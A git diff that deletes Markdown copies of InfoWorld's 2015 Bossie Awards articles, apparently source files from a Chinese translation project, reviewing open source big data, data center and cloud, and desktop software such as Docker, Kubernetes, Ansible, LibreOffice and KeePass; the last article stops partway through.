-![](http://core0.staticworld.net/images/article/2015/09/bossies-2015-zeppelin-100613963-orig.jpg)
-
-### Zeppelin ###
-
-While still in incubation, [Apache Zeppelin][34] is nevertheless stirring the data analytics and visualization pot. The Web-based notebook enables users to ingest, discover, analyze, and visualize their data. The notebook also allows you to collaborate with others to make data-driven, interactive documents incorporating a growing number of programming languages.
-
-This technology also boasts an integration with Spark and an interpreter concept allowing any language or data processing back end to be plugged into Zeppelin. Currently Zeppelin supports interpreters such as Scala, Python, SparkSQL, Hive, Markdown, and Shell.
-
-Zeppelin is still immature. I wanted to put a demo up but couldn’t find an easy way to disable “shell” as an execution option (among other things). However, it already looks better visually than IPython Notebook, which is the popular incumbent in this space. If you don’t want to spring for DataBricks Cloud or need something open source and extensible, this is the most promising distributed computing notebook around -- especially if you’re a Sparky type.
-
--- Andrew C. Oliver
-
-![](http://core0.staticworld.net/images/article/2015/09/bossies-2015-main-100613956-orig.jpg)
-
-### Read about more open source winners ###
-
-InfoWorld's Best of Open Source Awards for 2014 celebrate more than 100 open source projects, from the bottom of the stack to the top. Follow these links to more open source winners:
-
-[Bossie Awards 2015: The best open source applications][35]
-
-[Bossie Awards 2015: The best open source application development tools][36]
-
-[Bossie Awards 2015: The best open source big data tools][37]
-
-[Bossie Awards 2015: The best open source data center and cloud software][38]
-
-[Bossie Awards 2015: The best open source desktop and mobile software][39]
-
-[Bossie Awards 2015: The best open source networking and security software][40]
-
---------------------------------------------------------------------------------
-
-via: http://www.infoworld.com/article/2982429/open-source-tools/bossie-awards-2015-the-best-open-source-big-data-tools.html
-
-作者:[InfoWorld staff][a]
-译者:[译者ID](https://github.com/译者ID)
-校对:[校对者ID](https://github.com/校对者ID)
-
-本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
-
-[a]:http://www.infoworld.com/author/InfoWorld-staff/
-[1]:https://spark.apache.org/
-[2]:http://spark-packages.org/
-[3]:https://storm.apache.org/
-[4]:https://lmax-exchange.github.io/disruptor/
-[5]:http://h2o.ai/product/
-[6]:https://www.datatorrent.com/apex/
-[7]:https://github.com/DataTorrent/Malhar
-[8]:https://druid.io/
-[9]:https://flink.apache.org/
-[10]:https://www.elastic.co/products/elasticsearch
-[11]:http://lucene.apache.org/
-[12]:http://teiid.jboss.org/
-[13]:https://drill.apache.org/
-[14]:http://research.google.com/pubs/pub36632.html
-[15]:http://hbase.apache.org/
-[16]:http://phoenix.apache.org/
-[17]:https://hive.apache.org/
-[18]:https://kylin.incubator.apache.org/
-[19]:http://cdap.io/
-[20]:http://www.infoworld.com/article/2973381/application-development/apache-ranger-chuck-norris-hadoop-security.html
-[21]:https://ranger.incubator.apache.org/
-[22]:http://mesos.apache.org/
-[23]:https://amplab.cs.berkeley.edu/
-[24]:http://nerds.airbnb.com/introducing-chronos/
-[25]:http://aurora.apache.org/
-[26]:http://nifi.apache.org/
-[27]:https://kafka.apache.org/
-[28]:http://opentsdb.net/
-[29]:http://jupyter.org/
-[30]:http://https//github.com/ipython/ipython/wiki/IPython-kernels-for-other-languages
-[31]:https://github.com/clojure/tools.nrepl
-[32]:https://github.com/slime/slime
-[33]:http://blog.jupyter.org/2015/07/07/jupyter-funding-2015/
-[34]:https://zeppelin.incubator.apache.org/
-[35]:http://www.infoworld.com/article/2982622/bossie-awards-2015-the-best-open-source-applications.html
-[36]:http://www.infoworld.com/article/2982920/bossie-awards-2015-the-best-open-source-application-development-tools.html
-[37]:http://www.infoworld.com/article/2982429/bossie-awards-2015-the-best-open-source-big-data-tools.html
-[38]:http://www.infoworld.com/article/2982923/bossie-awards-2015-the-best-open-source-data-center-and-cloud-software.html
-[39]:http://www.infoworld.com/article/2982630/bossie-awards-2015-the-best-open-source-desktop-and-mobile-software.html
-[40]:http://www.infoworld.com/article/2982962/bossie-awards-2015-the-best-open-source-networking-and-security-software.html
\ No newline at end of file
diff --git a/sources/share/20151028 Bossie Awards 2015--The best open source data center and cloud software.md b/sources/share/20151028 Bossie Awards 2015--The best open source data center and cloud software.md
deleted file mode 100644
index 5640c75137..0000000000
--- a/sources/share/20151028 Bossie Awards 2015--The best open source data center and cloud software.md
+++ /dev/null
@@ -1,261 +0,0 @@
-Bossie Awards 2015: The best open source data center and cloud software
-================================================================================
-InfoWorld's top picks of the year in open source platforms, infrastructure, management, and orchestration software
-
-![](http://images.techhive.com/images/article/2015/09/bossies-2015-data-center-cloud-100613986-orig.jpg)
-
-### The best open source data center and cloud software ###
-
-You might have heard about this new thing called Docker containers. Developers love them because you can build them with a script, add services in layers, and push them right from your MacBook Pro to a server for testing. It works because they're superlightweight, unlike those now-archaic virtual machines. Containers -- and other lightweight approaches to deliver services -- are changing the shape of operating systems, applications, and the tools to manage them. Our Bossie winners in data center and cloud are leading the charge.
-
-![](http://core0.staticworld.net/images/article/2015/09/bossies-2015-docker-100613987-orig.jpg)
-
-### Docker Machine, Compose, and Swarm ###
-
-Docker’s open source container technology has been adopted by the major public clouds and is being built into the next version of Windows Server. Allowing developers and operations teams to separate applications from infrastructure, Docker is a powerful data center automation tool.
-
-However, containers are only part of the Docker story. Docker also provides a series of tools that allow you to use the Docker API to automate the entire container lifecycle, as well as handling application design and orchestration.
-
-[Machine][1] allows you to automate the provisioning of Docker Containers. Starting with a command line, you can use a single line of code to target one or more hosts, deploy the Docker engine, and even join it to a Swarm cluster. There’s support for most hypervisors and cloud platforms – all you need are your access credentials.
-
-[Swarm][2] handles clustering and scheduling, and it can be integrated with Mesos for more advanced scheduling capabilities. You can use Swarm to build a pool of container hosts, allowing your apps to scale out as demand increases. Applications and all of their dependencies can be defined with [Compose][3], which lets you link containers together into a distributed application and launch them as a group. Compose descriptions work across platforms, so you can take a developer configuration and quickly deploy in production.
-
--- Simon Bisson
-
-![](http://images.techhive.com/images/article/2015/09/bossies-2015-coreos-rkt-100613985-orig.jpg)
-
-### CoreOS and Rkt ###
-
-A thin, lightweight server OS, [CoreOS][4] is based on Google’s Chromium OS. Instead of using a package manager to install functions, it’s designed to be used with Linux containers. By using containers to extend a thin core, CoreOS allows you to quickly deploy applications, working well on cloud infrastructures.
-
-CoreOS’s container management tooling, fleet, is designed to treat a cluster of CoreOS servers as a single unit, with tools for managing high availability and for deploying containers to the cluster based on resource availability. A cross-cluster key/value store, etcd, handles device management and supports service discovery. If a node fails, etcd can quickly restore state on a new replica, giving you a distributed configuration management platform that’s linked to CoreOS’s automated update service.
-
-While CoreOS is perhaps best known for its Docker support, the CoreOS team is developing its own container runtime, rkt, with its own container format, the App Container Image. Also compatible with Docker containers, rkt has a modular architecture that allows different containerization systems (even hardware virtualization, in a proof of concept from Intel) to be plugged in. However, rkt is still in the early stages of development, so isn’t quite production ready.
-
--- Simon Bisson
-
-![](http://core0.staticworld.net/images/article/2015/09/bossies-2015-rancheros-100613997-orig.jpg)
-
-### RancherOS ###
-
-As we abstract more and more services away from the underlying operating system using containers, we can start thinking about what tomorrow’s operating system will look like. Similar to our applications, it’s going to be a modular set of services running on a thin kernel, self-configuring to offer only the services our applications need.
-
-[RancherOS][5] is a glimpse of what that OS might look like. Blending the Linux kernel with Docker, RancherOS is a minimal OS suitable for hosting container-based applications in cloud infrastructures. Instead of using standard Linux packaging techniques, RancherOS leverages Docker to host Linux user-space services and applications in separate container layers. A low-level Docker instance is first to boot, hosting system services in their own containers. Users' applications run in a higher-level Docker instance, separate from the system containers. If one of your containers crashes, the host keeps running.
-
-RancherOS is only 20MB in size, so it's easy to replicate across a data center. It’s also designed to be managed using automation tools, not manually, with API-level access that works with Docker’s management tools as well as with Rancher Labs’ own cloud infrastructure and management tools.
-
--- Simon Bisson
-
-![](http://images.techhive.com/images/article/2015/09/bossies-2015-kubernetes-100613991-orig.jpg)
-
-### Kubernetes ###
-
-Google’s [Kubernetes][6] container orchestration system is designed to manage and run applications built in Docker and Rocket containers. Focused on managing microservice applications, Kubernetes lets you distribute your containers across a cluster of hosts, while handling scaling and ensuring managed services run reliably.
-
-With containers providing an application abstraction layer, Kubernetes is an application-centric management service that supports many modern development paradigms, with a focus on user intent. That means you launch applications, and Kubernetes will manage the containers to run within the parameters you set, using the Kubernetes scheduler to make sure it gets the resources it needs. Containers are grouped into pods and managed by a replication engine that can recover failed containers or add more pods as applications scale.
-
-Kubernetes powers Google’s own Container Engine, and it runs on a range of other cloud and data center services, including AWS and Azure, as well as vSphere and Mesos. Containers can be either loosely or tightly coupled, so applications not designed for cloud PaaS operations can be migrated to the cloud as a tightly coupled set of containers. Kubernetes also supports rapid deployment of applications to a cluster, giving you an endpoint for a continuous delivery process.
-
--- Simon Bisson
-
-![](http://images.techhive.com/images/article/2015/09/bossies-2015-mesos-100613993-orig.jpg)
-
-### Mesos ###
-
-Turning a data center into a private or public cloud requires more than a hypervisor. It requires a new operating layer that can manage the data center resources as if they were a single computer, handling resources and scheduling. Described as a “distributed systems kernel,” [Apache Mesos][7] allows you to manage thousands of servers, using containers to host applications and APIs to support parallel application development.
-
-At the heart of Mesos is a set of daemons that expose resources to a central scheduler. Tasks are distributed across nodes, taking advantage of available CPU and memory. One key approach is the ability for applications to reject offered resources if they don’t meet requirements. It’s an approach that works well for big data applications, and you can use Mesos to run Hadoop and Cassandra distributed databases, as well as Apache’s own Spark data processing engine. There’s also support for the Jenkins continuous integration server, allowing you to run build and test workers in parallel on a cluster of servers, dynamically adjusting the tasks depending on workload.
-
-Designed to run on Linux and Mac OS X, Mesos has also recently been ported to Windows to support the development of scalable parallel applications on Azure.
-
--- Simon Bisson
-
-![](http://core0.staticworld.net/images/article/2015/09/bossies-2015-smartos-100614849-orig.jpg)
-
-### SmartOS and SmartDataCenter ###
-
-Joyent’s [SmartDataCenter][8] is the software that runs its public cloud, adding a management platform on top of its [SmartOS][9] thin server OS. A descendent of OpenSolaris that combines Zones containers and the KVM hypervisor, SmartOS is an in-memory operating system, quick to boot from a USB stick and run on bare-metal servers.
-
-Using SmartOS, you can quickly deploy a set of lightweight servers that can be programmatically managed via a set of JSON APIs, with functionality delivered via virtual machines, downloaded by built-in image management tools. Through the use of VMs, all userland operations are isolated from the underlying OS, reducing the security exposure of both the host and guests.
-
-SmartDataCenter runs on SmartOS servers, with one server running as a dedicated management node, and the rest of a cluster operating as compute nodes. You can get started with a Cloud On A Laptop build (available as a VMware virtual appliance) that lets you experiment with the management server. In a live data center, you’ll deploy SmartOS on your servers, using ZFS to handle storage – which includes your local image library. Services are deployed as images, with components stored in an object repository.
-
-The combination of SmartDataCenter and SmartOS builds on the experience of Joyent’s public cloud, giving you a tried and tested set of tools that can help you bootstrap your own cloud data center. It’s an infrastructure focused on virtual machines today, but laying the groundwork for tomorrow. A related Joyent project, [sdc-docker][10], exposes an entire SmartDataCenter cluster as a single Docker host, driven by native Docker commands.
-
--- Simon Bisson
-
-![](http://core0.staticworld.net/images/article/2015/09/bossies-2015-sensu-100614850-orig.jpg)
-
-### Sensu ###
-
-Managing large-scale data centers isn’t about working with server GUIs, it’s about automating scripts based on information from monitoring tools and services, routing information from sensors and logs, and then delivering actions to applications. One tool that’s beginning to offer this functionality is [Sensu][11], often described as a “monitoring router.”
-
-Scripts running across your data center deliver information to Sensu, which then routes it to the appropriate handler, using a publish-and-subscribe architecture based on RabbitMQ. Servers can be distributed, delivering published check results to handler code. You might see results in email, or in a Slack room, or in Sensu’s own dashboards. Message formats are defined in JSON files, or mutators used to format data on the fly, and messages can be filtered to one or more event handlers.
-
-Sensu is still a relatively young tool, but it’s one that shows a lot of promise. If you’re going to automate your data center, you’re going to need a tool like this not only to show you what’s happening, but to deliver that information where it’s most needed. A commercial option adds support for integration with third-party applications, but much of what you need to manage a data center is in the open source release.
-
--- Simon Bisson
-
-![](http://images.techhive.com/images/article/2015/09/bossies-2015-prometheus-100613996-orig.jpg)
-
-### Prometheus ###
-
-Managing a modern data center is a complex task. Racks of servers need to be treated like cattle rather than pets, and you need a monitoring system designed to handle hundreds and thousands of nodes. Monitoring applications presents special challenges, and that’s where [Prometheus][12] comes in to play. A service monitoring system designed to deliver alerts to operators, Prometheus can run on everything from a single laptop to a highly available cluster of monitoring servers.
-
-Time series data is captured and stored, then compared against patterns to identify faults and problems. You’ll need to expose data on HTTP endpoints, using a YAML file to configure the server. A browser-based reporting tool handles displaying data, with an expression console where you can experiment with queries. Dashboards can be created with a GUI builder, or written using a series of templates, letting you deliver application consoles that can be managed using version control systems such as Git.
-
-Captured data can be managed using expressions, which make it easy to aggregate data from several sources -- for example, letting you bring performance data from a series of Web endpoints into one store. An experimental alert manager module delivers alerts to common collaboration and devops tools, including Slack and PagerDuty. Official client libraries for common languages like Go and Java mean it’s easy to add Prometheus support to your applications and services, while third-party options extend Prometheus to Node.js and .Net.
-
--- Simon Bisson
-
-![](http://core0.staticworld.net/images/article/2015/09/bossies-2015-elk-100613988-orig.jpg)
-
-### Elasticsearch, Logstash, and Kibana ###
-
-Running a modern data center generates a lot of data, and it requires tools to get information out of that data. That’s where the combination of Elasticsearch, Logstash, and Kibana, often referred to as the ELK stack, comes into play.
-
-Designed to handle scalable search across a mix of content types, including structured and unstructured documents, [Elasticsearch][13] builds on Apache’s Lucene information retrieval tools, with a RESTful JSON API. It’s used to provide search for sites like Wikipedia and GitHub, using a distributed index with automated load balancing and routing.
-
-Under the fabric of a modern cloud is a physical array of servers, running as VM hosts. Monitoring many thousands of servers needs centralized logs. [Logstash][14] harvests and filters the logs generated by those servers (and by the applications running on them), using a forwarder on each physical and virtual machine. Logstash-formatted data is then delivered to Elasticsearch, giving you a search index that can be quickly scaled as you add more servers.
-
-At a higher level, [Kibana][15] adds a visualization layer to Elasticsearch, providing a Web dashboard for exploring and analyzing the data. Dashboards can be created around custom searches and shared with your team, providing a quick, easy-to-digest devops information feed.
-
--- Simon Bisson
-
-![](http://images.techhive.com/images/article/2015/09/bossies-2015-ansible-100613984-orig.jpg)
-
-### Ansible ###
-
-Managing server configuration is a key element of any devops approach to managing a modern data center or a cloud infrastructure. Configuration management tooling that takes a desired state approach to simplifies systems management at cloud scale, using server and application descriptions to handle server and application deployment.
-
-[Ansible][16] offers a minimal management service, using SSH to manage Unix nodes and PowerShell to work with Windows servers, with no need to deploy agents. An Ansible Playbook describes the state of a server or service in YAML, deploying Ansible modules to servers that handle configuration and removing them once the service is running. You can use Playbooks to orchestrate tasks -- for example, deploying several Web endpoints with a single script.
-
-It’s possible to make module creation and Playbook delivery part of a continuous delivery process, using build tools to deliver configurations and automate deployment. Ansible can pull in information from cloud service providers, simplifying management of virtual machines and networks. Monitoring tools in Ansible are able to trigger additional deployments automatically, helping manage and control cloud services, as well as working to manage resources used by large-scale data platforms like Hadoop.
-
--- Simon Bisson
-
-![](http://images.techhive.com/images/article/2015/09/bossies-2015-jenkins-100613990-orig.jpg)
-
-### Jenkins ###
-
-Getting continuous delivery right requires more than a structured way of handling development; it also requires tools for managing test and build. That’s where the [Jenkins][17] continuous integration server comes in. Jenkins works with your choice of source control, your test harnesses, and your build server. It’s a flexible tool, initially designed for working with Java but now extended to support Web and mobile development and even to build Windows applications.
-
-Jenkins is perhaps best thought of as a switching network, shunting files through a test and build process, and responding to signals from the various tools you’re using – thanks to a library of more than 1,000 plug-ins. These include tools for integrating Jenkins with both local Git instances and GitHub so that it's possible to extend a continuous development model into your build and delivery processes.
-
-Using an automation tool like Jenkins is as much about adopting a philosophy as it is about implementing a build process. Once you commit to continuous integration as part of a continuous delivery model, you’ll be running test and build cycles as soon as code is delivered to your source control release branch – and delivering it to users as soon as it’s in the main branch.
-
--- Simon Bisson
-
-![](http://core0.staticworld.net/images/article/2015/09/bossies-2015-nodejs-iojs-100613995-orig.jpg)
-
-### Node.js and io.js ###
-
-Modern cloud applications are built using different design patterns from the familiar n-tier enterprise and Web apps. They’re distributed, event-driven collections of services that can be quickly scaled and can support many thousands of simultaneous users. One key technology in this new paradigm is [Node.js][18], used by many major cloud platforms and easy to install as part of a thin server or container on cloud infrastructure.
-
-Key to the success of Node.js is the Npm package format, which allows you to quickly install extensions to the core Node.js service. These include frameworks like Express and Seneca, which help build scalable applications. A central registry handles package distribution, and dependencies are automatically installed.
-
-While the [io.js][19] fork exposed issues with project governance, it also allowed a group of developers to push forward adding ECMAScript 6 support to an Npm-compatible engine. After reconciliation between the two teams, the Node.js and io.js codebases have been merged, with new releases now coming from the io.js code repository.
-
-Other forks, like Microsoft’s io.js fork to add support for its 64-bit Chakra JavaScript engine alongside Google’s V8, are likely to be merged back into the main branch over the next year, keeping the Node.js platform evolving and cementing its role as the preferred host for cloud-scale microservices.
-
--- Simon Bisson
-
-![](http://images.techhive.com/images/article/2015/09/bossies-2015-seneca-100613998-orig.jpg)
-
-### Seneca ###
-
-The developers of the [Seneca][20] microservice framework have a motto: “Build it now, scale it later!” It’s an apt maxim for anyone thinking about developing microservices, as it allows you to start small, then add functionality as your service grows.
-
-Seneca is at heart an implementation of the [actor/message design pattern][21], focused on using Node.js as a switching engine that takes in messages, processes their contents, and sends an appropriate response, either to the message originator or to another service. By focusing on the message patterns that map to business use cases, it’s relatively easy to take Seneca and quickly build a minimum viable product for your application. A plug-in architecture makes it easy to integrate Seneca with other tools and to quickly add functionality to your services.
-
-You can easily add new patterns to your codebase or break existing patterns into separate services as the needs of your application grow or change. One pattern can also call another, allowing quick code reuse. It’s also easy to add Seneca to a message bus, so you can use it as a framework for working with data from Internet of things devices, as all you need to do is define a listening port where JSON data is delivered.
-
-Services may not be persistent, and Seneca gives you the option of using a built-in object relational mapping layer to handle data abstraction, with plug-ins for common databases.
-
--- Simon Bisson
-
-![](http://images.techhive.com/images/article/2015/09/bossies-2015-netcore-aspnet-100613994-orig.jpg)
-
-### .Net Core and ASP.Net vNext ###
-
-Microsoft’s [open-sourcing of .Net][22] is bringing much of the company’s Web platform into the open. The new [.Net Core][23] release runs on Windows, on OS X, and on Linux. Currently migrating from Microsoft’s Codeplex repository to GitHub, .Net Core offers a more modular approach to .Net, allowing you to install the functions you need as you need them.
-
-Currently under development is [ASP.Net 5][24], an open source version of the Web platform, which runs on .Net Core. You can work with it as the basis of Web apps using Microsoft’s MVC 6 framework. There’s also support for the new SignalR libraries, which add support for WebSockets and other real-time communications protocols.
-
-If you’re planning on using Microsoft’s new Nano server, you’ll be writing code against .Net Core, as it’s designed for thin environments. The new DNX, the .Net Execution environment, simplifies deployment of ASP.Net applications on a wide range of platforms, with tools for packaging code and for booting a runtime on a host. Features are added using the NuGet package manager, letting you use only the libraries you want.
-
-Microsoft’s open source .Net is still very young, but there’s a commitment in Redmond to ensure it’s successful. Support in Microsoft’s own next-generation server operating systems means it has a place in both the data center and the cloud.
-
--- Simon Bisson
-
-![](http://core0.staticworld.net/images/article/2015/09/bossies-2015-glusterfs-100613989-orig.jpg)
-
-### GlusterFS ###
-
-[GlusterFS][25] is a distributed file system. Gluster aggregates various storage servers into one large parallel network file system. You can [even use it in place of HDFS in a Hadoop cluster][26] or in place of an expensive SAN system -- or both. While HDFS is great for Hadoop, having a general-purpose distributed file system that doesn’t require you to transfer data to another location to analyze it is a key advantage.
-
-In an era of commoditized hardware, commoditized computing, and increased performance and latency requirements, buying a big, fat expensive EMC SAN and hoping it fits all of your needs (it won’t) is no longer your sole viable option. GlusterFS was acquired by Red Hat in 2011.
-
--- Andrew C. Oliver
-
-![](http://images.techhive.com/images/article/2015/09/bossies-2015-main-100613992-orig.jpg)
-
-### Read about more open source winners ###
-
-InfoWorld's Best of Open Source Awards for 2014 celebrate more than 100 open source projects, from the bottom of the stack to the top. Follow these links to more open source winners:
-
-[Bossie Awards 2015: The best open source applications][27]
-
-[Bossie Awards 2015: The best open source application development tools][28]
-
-[Bossie Awards 2015: The best open source big data tools][29]
-
-[Bossie Awards 2015: The best open source data center and cloud software][30]
-
-[Bossie Awards 2015: The best open source desktop and mobile software][31]
-
-[Bossie Awards 2015: The best open source networking and security software][32]
-
---------------------------------------------------------------------------------
-
-via: http://www.infoworld.com/article/2982923/open-source-tools/bossie-awards-2015-the-best-open-source-data-center-and-cloud-software.html
-
-作者:[InfoWorld staff][a]
-译者:[译者ID](https://github.com/译者ID)
-校对:[校对者ID](https://github.com/校对者ID)
-
-本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
-
-[a]:http://www.infoworld.com/author/InfoWorld-staff/
-[1]:https://www.docker.com/docker-machine
-[2]:https://www.docker.com/docker-swarm
-[3]:https://www.docker.com/docker-compose
-[4]:https://coreos.com/
-[5]:http://rancher.com/rancher-os/
-[6]:http://kubernetes.io/
-[7]:https://mesos.apache.org/
-[8]:https://github.com/joyent/sdc
-[9]:https://smartos.org/
-[10]:https://github.com/joyent/sdc-docker
-[11]:https://sensuapp.org/
-[12]:http://prometheus.io/
-[13]:https://www.elastic.co/products/elasticsearch
-[14]:https://www.elastic.co/products/logstash
-[15]:https://www.elastic.co/products/kibana
-[16]:http://www.ansible.com/home
-[17]:https://jenkins-ci.org/
-[18]:https://nodejs.org/en/
-[19]:https://iojs.org/en/
-[20]:http://senecajs.org/
-[21]:http://www.infoworld.com/article/2976422/application-development/how-to-use-actors-in-distributed-applications.html
-[22]:http://www.infoworld.com/article/2846450/microsoft-net/microsoft-open-sources-server-side-net-launches-visual-studio-2015-preview.html
-[23]:https://dotnet.github.io/core/
-[24]:http://www.asp.net/vnext
-[25]:http://www.gluster.org/
-[26]:http://www.gluster.org/community/documentation/index.php/Hadoop
-[27]:http://www.infoworld.com/article/2982622/bossie-awards-2015-the-best-open-source-applications.html
-[28]:http://www.infoworld.com/article/2982920/bossie-awards-2015-the-best-open-source-application-development-tools.html
-[29]:http://www.infoworld.com/article/2982429/bossie-awards-2015-the-best-open-source-big-data-tools.html
-[30]:http://www.infoworld.com/article/2982923/bossie-awards-2015-the-best-open-source-data-center-and-cloud-software.html
-[31]:http://www.infoworld.com/article/2982630/bossie-awards-2015-the-best-open-source-desktop-and-mobile-software.html
-[32]:http://www.infoworld.com/article/2982962/bossie-awards-2015-the-best-open-source-networking-and-security-software.html
\ No newline at end of file
diff --git a/sources/share/20151028 Bossie Awards 2015--The best open source desktop and mobile software.md b/sources/share/20151028 Bossie Awards 2015--The best open source desktop and mobile software.md
deleted file mode 100644
index 83b2b24a2e..0000000000
--- a/sources/share/20151028 Bossie Awards 2015--The best open source desktop and mobile software.md
+++ /dev/null
@@ -1,223 +0,0 @@
-Bossie Awards 2015: The best open source desktop and mobile software
-================================================================================
-InfoWorld's top picks in open source productivity tools, desktop utilities, and mobile apps
-
-![](http://core0.staticworld.net/images/article/2015/09/bossies-2015-desktop-mobile-100614439-orig.jpg)
-
-### The best open source desktop and mobile software ###
-
-Open source on the desktop has a long and distinguished history, and many of our Bossie winners in this category go back many years. Packed with features and still improving, some of these tools offer compelling alternatives to pricey commercial software. Others are utilities that we lean on daily for one reason or another -- the can openers and potato peelers of desktop productivity. One or two of them either plug holes in Windows, or they go the distance where Windows falls short.
-
-![](http://core0.staticworld.net/images/article/2015/09/bossies-2015-libreoffice-100614436-orig.jpg)
-
-### LibreOffice ###
-
-With the major release of version 5 in August, the Document Foundation’s [LibreOffice][1] offers a completely redesigned user interface, better compatibility with Microsoft Office (including good-but-not-great DOCX, XLSX, and PPTX file format support), and significant improvements to Calc, the spreadsheet application.
-
-Set against a turbulent background, the LibreOffice effort split from OpenOffice.org in 2010. In 2011, Oracle announced it would no longer support OpenOffice.org, and handed the trademark to the Apache Software Foundation. Since then, it has become [increasingly clear][2] that LibreOffice is winning the race for developers, features, and users.
-
--- Woody Leonhard
-
-![](http://images.techhive.com/images/article/2015/09/bossies-2015-firefox-100614426-orig.jpg)
-
-### Firefox ###
-
-In the battle of the big browsers, [Firefox][3] gets our vote over its longtime open source rival Chromium for two important reasons:
-
-• **Memory use**. Chromium, like its commercial cousin Chrome, has a nasty propensity to glom onto massive amounts of memory.
-
-• **Privacy**. Witness the [recent controversy][4] over Chromium automatically downloading a microphone snooping program to respond to “OK, Google.”
-
-Firefox may not have the most features or the down-to-the-millisecond fastest rendering engine. But it’s solid, stingy with resources, highly extensible, and most of all, it comes with no strings attached. There’s no ulterior data-gathering motive.
-
--- Woody Leonhard
-
-![](http://images.techhive.com/images/article/2015/09/bossies-2015-thunderbird-100614433-orig.jpg)
-
-### Thunderbird ###
-
-A longtime favorite email client, Mozilla’s [Thunderbird][5], may be getting a bit long in the tooth, but it’s still supported and showing signs of life. The latest version, 38.2, arrived in August, and there are plans for more development.
-
-Mozilla officially pulled its people off the project back in July 2012, but a hardcore group of volunteers, led by Kent James and the all-volunteer Thunderbird Council, continues to toil away. While you won’t find the latest email innovations in Thunderbird, you will find a solid core of basic functions based on local storage. If having mail in the cloud spooks you, it’s a good, private alternative. And if James goes ahead with his idea of encrypting Thunderbird mail end-to-end, there may be significant new life in the old bird.
-
--- Woody Leonhard
-
-![](http://core0.staticworld.net/images/article/2015/09/bossies-2015-notepad-100614432-orig.jpg)
-
-### Notepad++ ###
-
-If Windows Notepad handles all of your text editing (and source code editing and HTML editing) needs, more power to ya. For Windows users who yearn for a little bit more in a text editor, there’s Don Ho’s [Notepad++][6], which is the editor I turn to, over and over again.
-
-With tabbed views, drag-and-drop, color-coded hints for completing HTML commands, bookmarks, macro recording, shortcut keys, and every text encoding format you’re likely to encounter, Notepad++ takes text to a new level. We get frequent updates, too, with the latest in August.
-
--- Woody Leonhard
-
-![](http://core0.staticworld.net/images/article/2015/09/bossies-2015-vlc-100614435-orig.jpg)
-
-### VLC ###
-
-The stalwart [VLC][7] (formerly known as VideoLan Client) runs almost any kind of media file on almost any platform. Yes, it even works as a remote control on Apple Watch.
-
-The tiled Universal app version for Windows 10, in the Windows Store, draws some criticism for instability and lack of control, but in most cases VLC works, and it works well -- without external codecs. It even supports Blu-ray formats with two new libraries.
-
-The desktop version is a must-have for Windows 10, unless you’re ready to run the advertising gauntlets that are the Universal Groove Music and Movies & TV apps from Microsoft. VLC received a major [feature update][8] in February and a comprehensive bug fix in April.
-
--- Woody Leonhard
-
-![](http://images.techhive.com/images/article/2015/09/bossies-2015-7-zip-100614429-orig.jpg)
-
-### 7-Zip ###
-
-Long recognized as the preeminent open source ZIP archive manager for Windows, [7-Zip][9] works like a champ, even on the Windows 10 desktop. Full coverage for RAR files, which can be problematic in Windows, combine with password-protected file creation and support for self-extracting ZIPs. It’s one of those programs that just works.
-
-Yes, it would be nice to get a more modern file picker. Yes, it would be interesting to see a tiled Universal app version. But even without the fancy bells and whistles, 7-Zip deserves a place on every Windows desktop.
-
--- Woody Leonhard
-
-![](http://core0.staticworld.net/images/article/2015/09/bossies-2015-handbrake-100614427-orig.jpg)
-
-### Handbrake ###
-
-If you want to convert your DVDs (or video files in any commonly used format) into a file in some other format, or simply scrape them off a silver coaster, [Handbrake][10] is the way to do it. If you’re a Windows user, Handbrake is almost indispensible, since Microsoft doesn’t believe in ripping DVDs.
-
-Handbrake presents a number of handy presets for optimizing conversions for your target device (iPod, iPad, Android Tablet, and so on) It’s simple, and it’s fast. With the latest round of bug fixes released in June, Handbrake’s keeping up on maintenance -- and it works fine on the Windows 10 desktop.
-
--- Woody Leonhard
-
-![](http://images.techhive.com/images/article/2015/09/bossies-2015-keepass-100614430-orig.jpg)
-
-### KeePass ###
-
-I’ll confess that I almost gave up on [KeePass][11] because the primary download site goes to Sourceforge. That means you have to be extremely careful which boxes are checked and what you click on (and when) as you attempt to download and install the software. While KeePass itself is 100 percent clean open source (GNU GPL), Sourceforge doesn’t feel so constrained, and its [installers reek of crapware][12].
-
-One of many local-file password storage programs, KeePass distinguishes itself with broad scope, as well as its ability to run on all sorts of platforms, no installation required. KeePass will save not only passwords, but also credit card information and freely structured information. It provides a strong random password generator, and the database itself is locked with AES and Twofish, so nobody’s going to crack it. And it’s kept up to date, with a new stable release last month.
-
--- Woody Leonhard
-
-![](http://core0.staticworld.net/images/article/2015/09/bossies-2015-virtualbox-100614434-orig.jpg)
-
-### VirtualBox ###
-
-With a major release published in July, Oracle’s open source [VirtualBox][13] -- available for Windows, OS X, Linux, even Solaris --continues to give commercial counterparts VMware Workstation, VMware Fusion, Parallels Desktop, and Microsoft’s Hyper-V a hard run for their money. The Oracle team is still getting the final Windows 10 bugs ironed out, but come to think of it, so is Microsoft.
-
-VirtualBox doesn’t quite match the performance or polish of the VMware and Parallels products, but it’s getting closer. Version 5 brought long-awaited drag-and-drop support, making it easier to move files between VMs and host.
-
-I prefer VirtualBox over Hyper-V because it’s easy to control external devices. In Hyper-V, for example, getting sound to work is a pain in the neck, but in VirtualBox it only takes a click in setup. The shared clipboard between VM and host works wonders. Running speed on both is roughly the same, with a slight advantage to Hyper-V. But managing VirtualBox machines is much easier.
-
--- Woody Leonhard
-
-![](http://images.techhive.com/images/article/2015/09/bossies-2015-inkscape-100614428-orig.jpg)
-
-### Inkscape ###
-
-If you stand in awe of the designs created with Adobe Illustrator (or even CorelDraw), take a close look at [Inkscape][14]. Scalable vector images never looked so good.
-
-Version 0.91, released in January, uses a new internal graphics rendering engine called Cairo, sponsored by Google, to make the app run faster and allow for more accurate rendering. Inkscape will read and write SVG, PNG, PDF, even EPS, and many other formats. It can export Flash XML Graphics, HTML5 Canvas, and XAML, among others.
-
-There’s a strong community around Inkscape, and it’s built for easy extensibility. It’s available for Windows, OS X, and Linux.
-
--- Woody Leonhard
-
-![](http://core0.staticworld.net/images/article/2015/09/bossies-2015-keepassdroid-100614431-orig.jpg)
-
-### KeePassDroid ###
-
-Trying to remember all of the passwords we need today is impossible, and creating new ones to meet stringent password policy requirements can be agonizing. A port of KeePass for Android, [KeePassDroid][15] brings sanity preserving password management to mobile devices.
-
